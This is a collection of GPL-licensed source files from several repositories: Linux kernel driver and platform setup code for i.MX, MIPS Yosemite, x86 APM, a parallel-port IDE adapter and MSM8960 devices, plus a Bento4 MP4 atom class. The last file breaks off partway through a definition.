HeliumRom/android_kernel_nubia_nx507j | arch/arm/plat-mxc/devices/platform-imx-fb.c | 5635 | 1676 | /*
* Copyright (C) 2010 Pengutronix
* Uwe Kleine-Koenig <u.kleine-koenig@pengutronix.de>
*
* This program is free software; you can redistribute it and/or modify it under
* the terms of the GNU General Public License version 2 as published by the
* Free Software Foundation.
*/
#include <linux/dma-mapping.h>
#include <mach/hardware.h>
#include <mach/devices-common.h>
#define imx_imx_fb_data_entry_single(soc, _size) \
{ \
.iobase = soc ## _LCDC_BASE_ADDR, \
.iosize = _size, \
.irq = soc ## _INT_LCDC, \
}
#ifdef CONFIG_SOC_IMX1
const struct imx_imx_fb_data imx1_imx_fb_data __initconst =
imx_imx_fb_data_entry_single(MX1, SZ_4K);
#endif /* ifdef CONFIG_SOC_IMX1 */
#ifdef CONFIG_SOC_IMX21
const struct imx_imx_fb_data imx21_imx_fb_data __initconst =
imx_imx_fb_data_entry_single(MX21, SZ_4K);
#endif /* ifdef CONFIG_SOC_IMX21 */
#ifdef CONFIG_SOC_IMX25
const struct imx_imx_fb_data imx25_imx_fb_data __initconst =
imx_imx_fb_data_entry_single(MX25, SZ_16K);
#endif /* ifdef CONFIG_SOC_IMX25 */
#ifdef CONFIG_SOC_IMX27
const struct imx_imx_fb_data imx27_imx_fb_data __initconst =
imx_imx_fb_data_entry_single(MX27, SZ_4K);
#endif /* ifdef CONFIG_SOC_IMX27 */
struct platform_device *__init imx_add_imx_fb(
const struct imx_imx_fb_data *data,
const struct imx_fb_platform_data *pdata)
{
struct resource res[] = {
{
.start = data->iobase,
.end = data->iobase + data->iosize - 1,
.flags = IORESOURCE_MEM,
}, {
.start = data->irq,
.end = data->irq,
.flags = IORESOURCE_IRQ,
},
};
return imx_add_platform_device_dmamask("imx-fb", 0,
res, ARRAY_SIZE(res),
pdata, sizeof(*pdata), DMA_BIT_MASK(32));
}
| gpl-2.0 |
SlimRoms/kernel_samsung_crespo | arch/mips/pmc-sierra/yosemite/setup.c | 8963 | 6008 | /*
* Copyright (C) 2003 PMC-Sierra Inc.
* Author: Manish Lachwani (lachwani@pmc-sierra.com)
*
* Copyright (C) 2004 by Ralf Baechle (ralf@linux-mips.org)
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
* NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
* USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 675 Mass Ave, Cambridge, MA 02139, USA.
*/
#include <linux/bcd.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/mm.h>
#include <linux/bootmem.h>
#include <linux/swap.h>
#include <linux/ioport.h>
#include <linux/sched.h>
#include <linux/interrupt.h>
#include <linux/timex.h>
#include <linux/termios.h>
#include <linux/tty.h>
#include <linux/serial.h>
#include <linux/serial_core.h>
#include <linux/serial_8250.h>
#include <asm/time.h>
#include <asm/bootinfo.h>
#include <asm/page.h>
#include <asm/io.h>
#include <asm/irq.h>
#include <asm/processor.h>
#include <asm/reboot.h>
#include <asm/serial.h>
#include <asm/titan_dep.h>
#include <asm/m48t37.h>
#include "setup.h"
unsigned char titan_ge_mac_addr_base[6] = {
// 0x00, 0x03, 0xcc, 0x1d, 0x22, 0x00
0x00, 0xe0, 0x04, 0x00, 0x00, 0x21
};
unsigned long cpu_clock_freq;
unsigned long yosemite_base;
static struct m48t37_rtc *m48t37_base;
void __init bus_error_init(void)
{
/* Do nothing */
}
void read_persistent_clock(struct timespec *ts)
{
unsigned int year, month, day, hour, min, sec;
unsigned long flags;
spin_lock_irqsave(&rtc_lock, flags);
/* Stop the update to the time */
m48t37_base->control = 0x40;
year = bcd2bin(m48t37_base->year);
year += bcd2bin(m48t37_base->century) * 100;
month = bcd2bin(m48t37_base->month);
day = bcd2bin(m48t37_base->date);
hour = bcd2bin(m48t37_base->hour);
min = bcd2bin(m48t37_base->min);
sec = bcd2bin(m48t37_base->sec);
/* Start the update to the time again */
m48t37_base->control = 0x00;
spin_unlock_irqrestore(&rtc_lock, flags);
ts->tv_sec = mktime(year, month, day, hour, min, sec);
ts->tv_nsec = 0;
}
int rtc_mips_set_time(unsigned long tim)
{
struct rtc_time tm;
unsigned long flags;
/*
* Convert to a more useful format -- note months count from 0
* and years from 1900
*/
rtc_time_to_tm(tim, &tm);
tm.tm_year += 1900;
tm.tm_mon += 1;
spin_lock_irqsave(&rtc_lock, flags);
/* enable writing */
m48t37_base->control = 0x80;
/* year */
m48t37_base->year = bin2bcd(tm.tm_year % 100);
m48t37_base->century = bin2bcd(tm.tm_year / 100);
/* month */
m48t37_base->month = bin2bcd(tm.tm_mon);
/* day */
m48t37_base->date = bin2bcd(tm.tm_mday);
/* hour/min/sec */
m48t37_base->hour = bin2bcd(tm.tm_hour);
m48t37_base->min = bin2bcd(tm.tm_min);
m48t37_base->sec = bin2bcd(tm.tm_sec);
/* day of week -- not really used, but let's keep it up-to-date */
m48t37_base->day = bin2bcd(tm.tm_wday + 1);
/* disable writing */
m48t37_base->control = 0x00;
spin_unlock_irqrestore(&rtc_lock, flags);
return 0;
}
void __init plat_time_init(void)
{
mips_hpt_frequency = cpu_clock_freq / 2;
mips_hpt_frequency = 33000000 * 3 * 5;
}
unsigned long ocd_base;
EXPORT_SYMBOL(ocd_base);
/*
* Common setup before any secondaries are started
*/
#define TITAN_UART_CLK 3686400
#define TITAN_SERIAL_BASE_BAUD (TITAN_UART_CLK / 16)
#define TITAN_SERIAL_IRQ 4
#define TITAN_SERIAL_BASE 0xfd000008UL
static void __init py_map_ocd(void)
{
ocd_base = (unsigned long) ioremap(OCD_BASE, OCD_SIZE);
if (!ocd_base)
panic("Mapping OCD failed - game over. Your score is 0.");
/* Kludge for PMON bug ... */
OCD_WRITE(0x0710, 0x0ffff029);
}
static void __init py_uart_setup(void)
{
#ifdef CONFIG_SERIAL_8250
struct uart_port up;
/*
* Register to interrupt zero because we share the interrupt with
* the serial driver which we don't properly support yet.
*/
memset(&up, 0, sizeof(up));
up.membase = (unsigned char *) ioremap(TITAN_SERIAL_BASE, 8);
up.irq = TITAN_SERIAL_IRQ;
up.uartclk = TITAN_UART_CLK;
up.regshift = 0;
up.iotype = UPIO_MEM;
up.flags = UPF_BOOT_AUTOCONF | UPF_SKIP_TEST;
up.line = 0;
if (early_serial_setup(&up))
printk(KERN_ERR "Early serial init of port 0 failed\n");
#endif /* CONFIG_SERIAL_8250 */
}
static void __init py_rtc_setup(void)
{
m48t37_base = ioremap(YOSEMITE_RTC_BASE, YOSEMITE_RTC_SIZE);
if (!m48t37_base)
printk(KERN_ERR "Mapping the RTC failed\n");
}
/* Not only time init but that's what the hook it's called through is named */
static void __init py_late_time_init(void)
{
py_map_ocd();
py_uart_setup();
py_rtc_setup();
}
void __init plat_mem_setup(void)
{
late_time_init = py_late_time_init;
/* Add memory regions */
add_memory_region(0x00000000, 0x10000000, BOOT_MEM_RAM);
#if 0 /* XXX Crash ... */
OCD_WRITE(RM9000x2_OCD_HTSC,
OCD_READ(RM9000x2_OCD_HTSC) | HYPERTRANSPORT_ENABLE);
/* Set the BAR. Shifted mode */
OCD_WRITE(RM9000x2_OCD_HTBAR0, HYPERTRANSPORT_BAR0_ADDR);
OCD_WRITE(RM9000x2_OCD_HTMASK0, HYPERTRANSPORT_SIZE0);
#endif
}
| gpl-2.0 |
samno1607/LG-P920-Stock-Gingerbread-Kernel | arch/x86/boot/apm.c | 14339 | 1961 | /* -*- linux-c -*- ------------------------------------------------------- *
*
* Copyright (C) 1991, 1992 Linus Torvalds
* Copyright 2007 rPath, Inc. - All Rights Reserved
* Copyright 2009 Intel Corporation; author H. Peter Anvin
*
* Original APM BIOS checking by Stephen Rothwell, May 1994
* (sfr@canb.auug.org.au)
*
* This file is part of the Linux kernel, and is made available under
* the terms of the GNU General Public License version 2.
*
* ----------------------------------------------------------------------- */
/*
* Get APM BIOS information
*/
#include "boot.h"
int query_apm_bios(void)
{
struct biosregs ireg, oreg;
/* APM BIOS installation check */
initregs(&ireg);
ireg.ah = 0x53;
intcall(0x15, &ireg, &oreg);
if (oreg.flags & X86_EFLAGS_CF)
return -1; /* No APM BIOS */
if (oreg.bx != 0x504d) /* "PM" signature */
return -1;
if (!(oreg.cx & 0x02)) /* 32 bits supported? */
return -1;
/* Disconnect first, just in case */
ireg.al = 0x04;
intcall(0x15, &ireg, NULL);
/* 32-bit connect */
ireg.al = 0x03;
intcall(0x15, &ireg, &oreg);
boot_params.apm_bios_info.cseg = oreg.ax;
boot_params.apm_bios_info.offset = oreg.ebx;
boot_params.apm_bios_info.cseg_16 = oreg.cx;
boot_params.apm_bios_info.dseg = oreg.dx;
boot_params.apm_bios_info.cseg_len = oreg.si;
boot_params.apm_bios_info.cseg_16_len = oreg.hsi;
boot_params.apm_bios_info.dseg_len = oreg.di;
if (oreg.flags & X86_EFLAGS_CF)
return -1;
/* Redo the installation check as the 32-bit connect;
some BIOSes return different flags this way... */
ireg.al = 0x00;
intcall(0x15, &ireg, &oreg);
if ((oreg.eflags & X86_EFLAGS_CF) || oreg.bx != 0x504d) {
/* Failure with 32-bit connect, try to disconect and ignore */
ireg.al = 0x04;
intcall(0x15, &ireg, NULL);
return -1;
}
boot_params.apm_bios_info.version = oreg.ax;
boot_params.apm_bios_info.flags = oreg.cx;
return 0;
}
| gpl-2.0 |
javelinanddart/bricked-flo | drivers/block/paride/bpck.c | 14851 | 9505 | /*
bpck.c (c) 1996-8 Grant R. Guenther <grant@torque.net>
Under the terms of the GNU General Public License.
bpck.c is a low-level protocol driver for the MicroSolutions
"backpack" parallel port IDE adapter.
*/
/* Changes:
1.01 GRG 1998.05.05 init_proto, release_proto, pi->delay
1.02 GRG 1998.08.15 default pi->delay returned to 4
*/
#define BPCK_VERSION "1.02"
#include <linux/module.h>
#include <linux/init.h>
#include <linux/delay.h>
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/wait.h>
#include <asm/io.h>
#include "paride.h"
#undef r2
#undef w2
#define PC pi->private
#define r2() (PC=(in_p(2) & 0xff))
#define w2(byte) {out_p(2,byte); PC = byte;}
#define t2(pat) {PC ^= pat; out_p(2,PC);}
#define e2() {PC &= 0xfe; out_p(2,PC);}
#define o2() {PC |= 1; out_p(2,PC);}
#define j44(l,h) (((l>>3)&0x7)|((l>>4)&0x8)|((h<<1)&0x70)|(h&0x80))
/* cont = 0 - access the IDE register file
cont = 1 - access the IDE command set
cont = 2 - use internal bpck register addressing
*/
static int cont_map[3] = { 0x40, 0x48, 0 };
static int bpck_read_regr( PIA *pi, int cont, int regr )
{ int r, l, h;
r = regr + cont_map[cont];
switch (pi->mode) {
case 0: w0(r & 0xf); w0(r); t2(2); t2(4);
l = r1();
t2(4);
h = r1();
return j44(l,h);
case 1: w0(r & 0xf); w0(r); t2(2);
e2(); t2(0x20);
t2(4); h = r0();
t2(1); t2(0x20);
return h;
case 2:
case 3:
case 4: w0(r); w2(9); w2(0); w2(0x20);
h = r4();
w2(0);
return h;
}
return -1;
}
static void bpck_write_regr( PIA *pi, int cont, int regr, int val )
{ int r;
r = regr + cont_map[cont];
switch (pi->mode) {
case 0:
case 1: w0(r);
t2(2);
w0(val);
o2(); t2(4); t2(1);
break;
case 2:
case 3:
case 4: w0(r); w2(9); w2(0);
w0(val); w2(1); w2(3); w2(0);
break;
}
}
/* These macros access the bpck registers in native addressing */
#define WR(r,v) bpck_write_regr(pi,2,r,v)
#define RR(r) (bpck_read_regr(pi,2,r))
static void bpck_write_block( PIA *pi, char * buf, int count )
{ int i;
switch (pi->mode) {
case 0: WR(4,0x40);
w0(0x40); t2(2); t2(1);
for (i=0;i<count;i++) { w0(buf[i]); t2(4); }
WR(4,0);
break;
case 1: WR(4,0x50);
w0(0x40); t2(2); t2(1);
for (i=0;i<count;i++) { w0(buf[i]); t2(4); }
WR(4,0x10);
break;
case 2: WR(4,0x48);
w0(0x40); w2(9); w2(0); w2(1);
for (i=0;i<count;i++) w4(buf[i]);
w2(0);
WR(4,8);
break;
case 3: WR(4,0x48);
w0(0x40); w2(9); w2(0); w2(1);
for (i=0;i<count/2;i++) w4w(((u16 *)buf)[i]);
w2(0);
WR(4,8);
break;
case 4: WR(4,0x48);
w0(0x40); w2(9); w2(0); w2(1);
for (i=0;i<count/4;i++) w4l(((u32 *)buf)[i]);
w2(0);
WR(4,8);
break;
}
}
static void bpck_read_block( PIA *pi, char * buf, int count )
{ int i, l, h;
switch (pi->mode) {
case 0: WR(4,0x40);
w0(0x40); t2(2);
for (i=0;i<count;i++) {
t2(4); l = r1();
t2(4); h = r1();
buf[i] = j44(l,h);
}
WR(4,0);
break;
case 1: WR(4,0x50);
w0(0x40); t2(2); t2(0x20);
for(i=0;i<count;i++) { t2(4); buf[i] = r0(); }
t2(1); t2(0x20);
WR(4,0x10);
break;
case 2: WR(4,0x48);
w0(0x40); w2(9); w2(0); w2(0x20);
for (i=0;i<count;i++) buf[i] = r4();
w2(0);
WR(4,8);
break;
case 3: WR(4,0x48);
w0(0x40); w2(9); w2(0); w2(0x20);
for (i=0;i<count/2;i++) ((u16 *)buf)[i] = r4w();
w2(0);
WR(4,8);
break;
case 4: WR(4,0x48);
w0(0x40); w2(9); w2(0); w2(0x20);
for (i=0;i<count/4;i++) ((u32 *)buf)[i] = r4l();
w2(0);
WR(4,8);
break;
}
}
static int bpck_probe_unit ( PIA *pi )
{ int o1, o0, f7, id;
int t, s;
id = pi->unit;
s = 0;
w2(4); w2(0xe); r2(); t2(2);
o1 = r1()&0xf8;
o0 = r0();
w0(255-id); w2(4); w0(id);
t2(8); t2(8); t2(8);
t2(2); t = r1()&0xf8;
f7 = ((id % 8) == 7);
if ((f7) || (t != o1)) { t2(2); s = r1()&0xf8; }
if ((t == o1) && ((!f7) || (s == o1))) {
w2(0x4c); w0(o0);
return 0;
}
t2(8); w0(0); t2(2); w2(0x4c); w0(o0);
return 1;
}
static void bpck_connect ( PIA *pi )
{ pi->saved_r0 = r0();
w0(0xff-pi->unit); w2(4); w0(pi->unit);
t2(8); t2(8); t2(8);
t2(2); t2(2);
switch (pi->mode) {
case 0: t2(8); WR(4,0);
break;
case 1: t2(8); WR(4,0x10);
break;
case 2:
case 3:
case 4: w2(0); WR(4,8);
break;
}
WR(5,8);
if (pi->devtype == PI_PCD) {
WR(0x46,0x10); /* fiddle with ESS logic ??? */
WR(0x4c,0x38);
WR(0x4d,0x88);
WR(0x46,0xa0);
WR(0x41,0);
WR(0x4e,8);
}
}
static void bpck_disconnect ( PIA *pi )
{ w0(0);
if (pi->mode >= 2) { w2(9); w2(0); } else t2(2);
w2(0x4c); w0(pi->saved_r0);
}
static void bpck_force_spp ( PIA *pi )
/* This fakes the EPP protocol to turn off EPP ... */
{ pi->saved_r0 = r0();
w0(0xff-pi->unit); w2(4); w0(pi->unit);
t2(8); t2(8); t2(8);
t2(2); t2(2);
w2(0);
w0(4); w2(9); w2(0);
w0(0); w2(1); w2(3); w2(0);
w0(0); w2(9); w2(0);
w2(0x4c); w0(pi->saved_r0);
}
#define TEST_LEN 16
static int bpck_test_proto( PIA *pi, char * scratch, int verbose )
{ int i, e, l, h, om;
char buf[TEST_LEN];
bpck_force_spp(pi);
switch (pi->mode) {
case 0: bpck_connect(pi);
WR(0x13,0x7f);
w0(0x13); t2(2);
for(i=0;i<TEST_LEN;i++) {
t2(4); l = r1();
t2(4); h = r1();
buf[i] = j44(l,h);
}
bpck_disconnect(pi);
break;
case 1: bpck_connect(pi);
WR(0x13,0x7f);
w0(0x13); t2(2); t2(0x20);
for(i=0;i<TEST_LEN;i++) { t2(4); buf[i] = r0(); }
t2(1); t2(0x20);
bpck_disconnect(pi);
break;
case 2:
case 3:
case 4: om = pi->mode;
pi->mode = 0;
bpck_connect(pi);
WR(7,3);
WR(4,8);
bpck_disconnect(pi);
pi->mode = om;
bpck_connect(pi);
w0(0x13); w2(9); w2(1); w0(0); w2(3); w2(0); w2(0xe0);
switch (pi->mode) {
case 2: for (i=0;i<TEST_LEN;i++) buf[i] = r4();
break;
case 3: for (i=0;i<TEST_LEN/2;i++) ((u16 *)buf)[i] = r4w();
break;
case 4: for (i=0;i<TEST_LEN/4;i++) ((u32 *)buf)[i] = r4l();
break;
}
w2(0);
WR(7,0);
bpck_disconnect(pi);
break;
}
if (verbose) {
printk("%s: bpck: 0x%x unit %d mode %d: ",
pi->device,pi->port,pi->unit,pi->mode);
for (i=0;i<TEST_LEN;i++) printk("%3d",buf[i]);
printk("\n");
}
e = 0;
for (i=0;i<TEST_LEN;i++) if (buf[i] != (i+1)) e++;
return e;
}
static void bpck_read_eeprom ( PIA *pi, char * buf )
{ int i,j,k,n,p,v,f, om, od;
bpck_force_spp(pi);
om = pi->mode; od = pi->delay;
pi->mode = 0; pi->delay = 6;
bpck_connect(pi);
n = 0;
WR(4,0);
for (i=0;i<64;i++) {
WR(6,8);
WR(6,0xc);
p = 0x100;
for (k=0;k<9;k++) {
f = (((i + 0x180) & p) != 0) * 2;
WR(6,f+0xc);
WR(6,f+0xd);
WR(6,f+0xc);
p = (p >> 1);
}
for (j=0;j<2;j++) {
v = 0;
for (k=0;k<8;k++) {
WR(6,0xc);
WR(6,0xd);
WR(6,0xc);
f = RR(0);
v = 2*v + (f == 0x84);
}
buf[2*i+1-j] = v;
}
}
WR(6,8);
WR(6,0);
WR(5,8);
bpck_disconnect(pi);
if (om >= 2) {
bpck_connect(pi);
WR(7,3);
WR(4,8);
bpck_disconnect(pi);
}
pi->mode = om; pi->delay = od;
}
static int bpck_test_port ( PIA *pi ) /* check for 8-bit port */
{ int i, r, m;
w2(0x2c); i = r0(); w0(255-i); r = r0(); w0(i);
m = -1;
if (r == i) m = 2;
if (r == (255-i)) m = 0;
w2(0xc); i = r0(); w0(255-i); r = r0(); w0(i);
if (r != (255-i)) m = -1;
if (m == 0) { w2(6); w2(0xc); r = r0(); w0(0xaa); w0(r); w0(0xaa); }
if (m == 2) { w2(0x26); w2(0xc); }
if (m == -1) return 0;
return 5;
}
static void bpck_log_adapter( PIA *pi, char * scratch, int verbose )
{ char *mode_string[5] = { "4-bit","8-bit","EPP-8",
"EPP-16","EPP-32" };
#ifdef DUMP_EEPROM
int i;
#endif
bpck_read_eeprom(pi,scratch);
#ifdef DUMP_EEPROM
if (verbose) {
for(i=0;i<128;i++)
if ((scratch[i] < ' ') || (scratch[i] > '~'))
scratch[i] = '.';
printk("%s: bpck EEPROM: %64.64s\n",pi->device,scratch);
printk("%s: %64.64s\n",pi->device,&scratch[64]);
}
#endif
printk("%s: bpck %s, backpack %8.8s unit %d",
pi->device,BPCK_VERSION,&scratch[110],pi->unit);
printk(" at 0x%x, mode %d (%s), delay %d\n",pi->port,
pi->mode,mode_string[pi->mode],pi->delay);
}
static struct pi_protocol bpck = {
.owner = THIS_MODULE,
.name = "bpck",
.max_mode = 5,
.epp_first = 2,
.default_delay = 4,
.max_units = 255,
.write_regr = bpck_write_regr,
.read_regr = bpck_read_regr,
.write_block = bpck_write_block,
.read_block = bpck_read_block,
.connect = bpck_connect,
.disconnect = bpck_disconnect,
.test_port = bpck_test_port,
.probe_unit = bpck_probe_unit,
.test_proto = bpck_test_proto,
.log_adapter = bpck_log_adapter,
};
static int __init bpck_init(void)
{
return paride_register(&bpck);
}
static void __exit bpck_exit(void)
{
paride_unregister(&bpck);
}
MODULE_LICENSE("GPL");
module_init(bpck_init)
module_exit(bpck_exit)
| gpl-2.0 |
xbmcin/XBMCinTC | project/cmake/addons/build/inputstream.smoothstream/lib/libbento4/Core/Ap4OddaAtom.cpp | 4 | 5994 | /*****************************************************************
|
| AP4 - odda Atoms
|
| Copyright 2002-2008 Axiomatic Systems, LLC
|
|
| This file is part of Bento4/AP4 (MP4 Atom Processing Library).
|
| Unless you have obtained Bento4 under a difference license,
| this version of Bento4 is Bento4|GPL.
| Bento4|GPL is free software; you can redistribute it and/or modify
| it under the terms of the GNU General Public License as published by
| the Free Software Foundation; either version 2, or (at your option)
| any later version.
|
| Bento4|GPL is distributed in the hope that it will be useful,
| but WITHOUT ANY WARRANTY; without even the implied warranty of
| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
| GNU General Public License for more details.
|
| You should have received a copy of the GNU General Public License
| along with Bento4|GPL; see the file COPYING. If not, write to the
| Free Software Foundation, 59 Temple Place - Suite 330, Boston, MA
| 02111-1307, USA.
|
****************************************************************/
/*----------------------------------------------------------------------
| includes
+---------------------------------------------------------------------*/
#include "Ap4Utils.h"
#include "Ap4OddaAtom.h"
/*----------------------------------------------------------------------
| dynamic cast support
+---------------------------------------------------------------------*/
AP4_DEFINE_DYNAMIC_CAST_ANCHOR(AP4_OddaAtom)
/*----------------------------------------------------------------------
| AP4_OddaAtom::Create
+---------------------------------------------------------------------*/
AP4_OddaAtom*
AP4_OddaAtom::Create(AP4_UI64 size,
AP4_ByteStream& stream)
{
AP4_UI08 version;
AP4_UI32 flags;
if (AP4_FAILED(AP4_Atom::ReadFullHeader(stream, version, flags))) return NULL;
if (version != 0) return NULL;
return new AP4_OddaAtom(size, version, flags, stream);
}
/*----------------------------------------------------------------------
| AP4_OddaAtom::AP4_OddaAtom
+---------------------------------------------------------------------*/
AP4_OddaAtom::AP4_OddaAtom(AP4_UI64 size,
AP4_UI08 version,
AP4_UI32 flags,
AP4_ByteStream& stream) :
AP4_Atom(AP4_ATOM_TYPE_ODDA, size, true, version, flags)
{
// data length
stream.ReadUI64(m_EncryptedDataLength);
// get the source stream position
AP4_Position position;
stream.Tell(position);
// create a substream to represent the payload
m_EncryptedPayload = new AP4_SubStream(stream, position, m_EncryptedDataLength);
// seek to the end
stream.Seek(position+m_EncryptedDataLength);
}
/*----------------------------------------------------------------------
| AP4_OddaAtom::AP4_OddaAtom
+---------------------------------------------------------------------*/
AP4_OddaAtom::AP4_OddaAtom(AP4_ByteStream& encrypted_payload) :
AP4_Atom(AP4_ATOM_TYPE_ODDA, 0, true, 0, 0)
{
// encrypted data length
encrypted_payload.GetSize(m_EncryptedDataLength);
// update our size
SetSize(AP4_FULL_ATOM_HEADER_SIZE_64+8+m_EncryptedDataLength, true);
// keep a reference to the encrypted payload
m_EncryptedPayload = &encrypted_payload;
m_EncryptedPayload->AddReference();
}
/*----------------------------------------------------------------------
| AP4_OddaAtom::~AP4_OddaAtom
+---------------------------------------------------------------------*/
AP4_OddaAtom::~AP4_OddaAtom()
{
if (m_EncryptedPayload) m_EncryptedPayload->Release();
}
/*----------------------------------------------------------------------
| AP4_OddaAtom::SetEncryptedPayload
+---------------------------------------------------------------------*/
AP4_Result
AP4_OddaAtom::SetEncryptedPayload(AP4_ByteStream& stream, AP4_LargeSize length)
{
// keep a reference to the stream
if (m_EncryptedPayload) {
m_EncryptedPayload->Release();
}
m_EncryptedPayload = &stream;
m_EncryptedPayload->AddReference();
// update the size
m_EncryptedDataLength = length;
SetSize(AP4_FULL_ATOM_HEADER_SIZE_64 + 8 + length, true);
if (m_Parent) m_Parent->OnChildChanged(this);
return AP4_SUCCESS;
}
/*----------------------------------------------------------------------
| AP4_OddaAtom::SetEncryptedPayload
+---------------------------------------------------------------------*/
AP4_Result
AP4_OddaAtom::SetEncryptedPayload(AP4_ByteStream& stream)
{
// the new encrypted data length is the size of the stream
AP4_LargeSize length;
AP4_Result result = stream.GetSize(length);
if (AP4_FAILED(result)) return result;
return SetEncryptedPayload(stream, length);
}
/*----------------------------------------------------------------------
| AP4_OddaAtom::WriteFields
+---------------------------------------------------------------------*/
AP4_Result
AP4_OddaAtom::WriteFields(AP4_ByteStream& stream)
{
// write the content type
AP4_CHECK(stream.WriteUI64(m_EncryptedDataLength));
// check that we have a source stream
// and a normal size
if (m_EncryptedPayload == NULL || GetSize() < 8) {
return AP4_FAILURE;
}
// rewind the encrypted stream
AP4_CHECK(m_EncryptedPayload->Seek(0));
// copy the encrypted stream to the output
AP4_CHECK(m_EncryptedPayload->CopyTo(stream, m_EncryptedDataLength));
return AP4_SUCCESS;
}
/*----------------------------------------------------------------------
| AP4_OddaAtom::InspectFields
+---------------------------------------------------------------------*/
AP4_Result
AP4_OddaAtom::InspectFields(AP4_AtomInspector& inspector)
{
inspector.AddField("encrypted_data_length", (AP4_UI32)m_EncryptedDataLength);
return AP4_SUCCESS;
}
| gpl-2.0 |
jorik041/Unleashed-Kernel-Series | arch/arm/mach-msm/devices-8960.c | 4 | 107054 | /* Copyright (c) 2011-2013, The Linux Foundation. All rights reserved.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 and
* only version 2 as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
*/
#include <linux/kernel.h>
#include <linux/list.h>
#include <linux/platform_device.h>
#include <linux/msm_rotator.h>
#include <linux/msm_ion.h>
#include <linux/gpio.h>
#include <linux/coresight.h>
#include <asm/clkdev.h>
#include <mach/kgsl.h>
#include <mach/irqs-8960.h>
#include <mach/dma.h>
#include <linux/dma-mapping.h>
#include <mach/board.h>
#include <mach/msm_iomap.h>
#include <mach/msm_hsusb.h>
#include <mach/msm_sps.h>
#include <mach/rpm.h>
#include <mach/msm_bus_board.h>
#include <mach/msm_memtypes.h>
#include <mach/msm_smd.h>
#include <mach/msm_dcvs.h>
#include <mach/msm_rtb.h>
#include <mach/msm_cache_dump.h>
#include <mach/clk-provider.h>
#include <sound/msm-dai-q6.h>
#include <sound/apr_audio.h>
#include <mach/msm_tsif.h>
#include <mach/msm_serial_hs_lite.h>
#include "clock.h"
#include "devices.h"
#include "devices-msm8x60.h"
#include "footswitch.h"
#include "msm_watchdog.h"
#include "rpm_log.h"
#include "rpm_stats.h"
#include "pil-q6v4.h"
#include "scm-pas.h"
#include <mach/msm_dcvs.h>
#include <mach/iommu_domains.h>
#include <mach/socinfo.h>
#include "pm.h"
#ifdef CONFIG_MSM_MPM
#include <mach/mpm.h>
#endif
#ifdef CONFIG_MSM_DSPS
#include <mach/msm_dsps.h>
#endif
/* Address of GSBI blocks */
#define MSM_GSBI1_PHYS 0x16000000
#define MSM_GSBI2_PHYS 0x16100000
#define MSM_GSBI3_PHYS 0x16200000
#define MSM_GSBI4_PHYS 0x16300000
#define MSM_GSBI5_PHYS 0x16400000
#define MSM_GSBI6_PHYS 0x16500000
#define MSM_GSBI7_PHYS 0x16600000
#define MSM_GSBI8_PHYS 0x1A000000
#define MSM_GSBI9_PHYS 0x1A100000
#define MSM_GSBI10_PHYS 0x1A200000
#define MSM_GSBI11_PHYS 0x12440000
#define MSM_GSBI12_PHYS 0x12480000
#define MSM_UART2DM_PHYS (MSM_GSBI2_PHYS + 0x40000)
#define MSM_UART5DM_PHYS (MSM_GSBI5_PHYS + 0x40000)
#define MSM_UART6DM_PHYS (MSM_GSBI6_PHYS + 0x40000)
#define MSM_UART8DM_PHYS (MSM_GSBI8_PHYS + 0x40000)
#define MSM_UART9DM_PHYS (MSM_GSBI9_PHYS + 0x40000)
/* GSBI QUP devices */
#define MSM_GSBI1_QUP_PHYS (MSM_GSBI1_PHYS + 0x80000)
#define MSM_GSBI2_QUP_PHYS (MSM_GSBI2_PHYS + 0x80000)
#define MSM_GSBI3_QUP_PHYS (MSM_GSBI3_PHYS + 0x80000)
#define MSM_GSBI4_QUP_PHYS (MSM_GSBI4_PHYS + 0x80000)
#define MSM_GSBI5_QUP_PHYS (MSM_GSBI5_PHYS + 0x80000)
#define MSM_GSBI6_QUP_PHYS (MSM_GSBI6_PHYS + 0x80000)
#define MSM_GSBI7_QUP_PHYS (MSM_GSBI7_PHYS + 0x80000)
#define MSM_GSBI8_QUP_PHYS (MSM_GSBI8_PHYS + 0x80000)
#define MSM_GSBI9_QUP_PHYS (MSM_GSBI9_PHYS + 0x80000)
#define MSM_GSBI10_QUP_PHYS (MSM_GSBI10_PHYS + 0x80000)
#define MSM_GSBI11_QUP_PHYS (MSM_GSBI11_PHYS + 0x20000)
#define MSM_GSBI12_QUP_PHYS (MSM_GSBI12_PHYS + 0x20000)
#define MSM_QUP_SIZE SZ_4K
#define MSM_PMIC1_SSBI_CMD_PHYS 0x00500000
#define MSM_PMIC2_SSBI_CMD_PHYS 0x00C00000
#define MSM_PMIC_SSBI_SIZE SZ_4K
#define MSM8960_HSUSB_PHYS 0x12500000
#define MSM8960_HSUSB_SIZE SZ_4K
#define MSM8960_RPM_MASTER_STATS_BASE 0x10BB00
#define MSM8960_PC_CNTR_PHYS (MSM8960_IMEM_PHYS + 0x664)
#define MSM8960_PC_CNTR_SIZE 0x40
static struct resource msm8960_resources_pccntr[] = {
{
